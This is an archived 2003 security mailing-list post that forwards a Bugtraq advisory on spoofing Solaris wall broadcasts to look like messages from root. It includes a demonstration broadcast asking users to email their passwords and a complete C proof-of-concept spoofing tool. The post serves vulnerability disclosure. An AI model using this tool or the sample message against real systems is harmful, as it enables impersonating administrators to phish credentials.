FW: Solaris 2.x /usr/sbin/wall Advisory
From: Martin Robson (martin@radialsoftware.com)
Date: 01/03/03
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Martin Robson" <martin@radialsoftware.com> To: <FOCUS-SUN@securityfocus.com> Date: Fri, 3 Jan 2003 09:21:36 -0800
-----Original Message-----
From: Brant Roman [mailto:broman@apollo.gti.net]
Sent: Friday, January 03, 2003 8:53 AM
To: bugtraq@securityfocus.com
Subject: Solaris 2.x /usr/sbin/wall Advisory
Affected Operating System(s): Solaris 2.x-9
Possibly others derived from AT&T source code.
Affected Program: /usr/sbin/wall
Synopsis:
Wall is a setgid tty program that broadcasts a message to every user
currently logged into the system. It can also receive messages from
remote hosts, via RPC (rpc.walld).
The way that wall differentiates between messages sent by local and
remote users is by checking if the file descriptor pointed to by stderr
corresponds to a tty. If it doesn't, wall checks if the first 5 bytes
of the message are "From ". If this is true, the next non-white
characters must be in the form of user@host. One can simulate an
rpc.walld message by simply closing stderr before executing
/usr/sbin/wall and sending a fake "From " header.
If this is achieved, it may be possible (by pretending to be an
administrator), to fool users into doing things they wouldn't normally
do!
Example:
> ./wallspoof root@localhost
Enter your message below. End your message with an EOF (Control+D).
We'll be upgrading the system tonight. Everyone needs to e-mail their
passwords to suprhakr (he's in charge of security). If you don't do
this you won't have an account in the morning. Thanks. <Done> Broadcast
Message from root (rpc.rwalld) on localhost Fri Jan 3 09:39:49... From
root@localhost:We'll be upgrading the system tonight. Everyone needs to
e-mail their passwords to suprhakr (he's in charge of security). If you
don't do this you won't have an account in the morning. Thanks.
>
This is how easily users can be tricked!
I believe this is a serious vulnerability, one which requires an
IMMEDIATE patch from Sun. Anyone who runs Solaris is at risk. You have
probably already been owned.
Proof of concept:
/*
wallspoof.c - SOLARIS (X86/SPARC) Exploit
Don't use this in a malicious way! (i.e. to own people)
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
int main(int argc, char **argv)
{
char *userhost;
char mesg[2050];
FILE *tmp;
if (argc < 2) {
fprintf (stderr, "usage: wallspoof user@host\n");
exit (-1);
}
userhost = argv[1];
if ((tmp = fopen("/tmp/rxax", "w")) == NULL) {
perror ("open");
exit (-1);
}
printf ("Enter your message below. End your message with an EOF
(Control+D).\n");
fprintf (tmp, "From %s:", userhost);
while (fgets(mesg, 2050, stdin) != NULL)
fprintf (tmp, "%s", mesg);
fclose (tmp);
fclose (stderr);
printf ("<Done>\n");
system ("/usr/sbin/wall < /tmp/rxax");
unlink ("/tmp/rxax");
}
------------------
Martin Robson
CEO / President
Radial Software Development Inc.
Phone / Fax - (604) 692-5971
martin@radialsoftware.com
http://www.radialsoftware.com
- Next message: Ali Ernalbant: "adminlog"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
